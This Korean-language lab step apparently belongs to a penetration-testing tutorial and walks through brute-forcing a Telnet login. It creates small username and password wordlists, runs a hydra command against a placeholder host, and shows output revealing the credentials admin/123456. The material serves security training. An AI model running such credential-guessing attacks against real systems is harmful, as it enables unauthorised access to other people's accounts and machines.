무차별 대입 (Brute Force) 을 이용한 Telnet 대상 연결
이 단계에서는 hydra를 사용하여 Telnet 서비스에 대한 무차별 대입 공격 (brute-force attack) 을 수행합니다. 비밀번호를 모르기 때문에 hydra에 잠재적인 사용자 이름과 비밀번호 목록을 제공하여 자동으로 시도하도록 할 것입니다.
먼저 두 개의 간단한 단어 목록 (wordlist) 을 생성합니다. 하나는 사용자 이름 (users.txt) 용이고 다른 하나는 비밀번호 (pass.txt) 용입니다. 일반적이고 가능성 있는 후보들을 포함시킬 것입니다.
사용자 이름 목록 생성:
echo -e "admin\nuser\nroot" > users.txt
비밀번호 목록 생성:
echo -e "password\nadmin\n123456" > pass.txt
이제 hydra를 사용하여 공격을 시작합니다. -L 플래그는 사용자 목록을 지정하고, -P 플래그는 비밀번호 목록을 지정하며, telnet://target은 공격할 프로토콜과 호스트를 정의합니다.
hydra -L users.txt -P pass.txt telnet://target
hydra는 이제 목록에 있는 모든 사용자 이름과 비밀번호 조합으로 로그인을 시도합니다. 잠시 후 올바른 자격 증명을 찾아 표시할 것입니다.
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-09-19 14:11:54
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking telnet://target:23/
[23][telnet] host: target login: admin password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-09-19 14:11:57
출력은 사용자 이름 admin과 비밀번호 123456으로 유효한 로그인이 발견되었음을 명확하게 보여줍니다.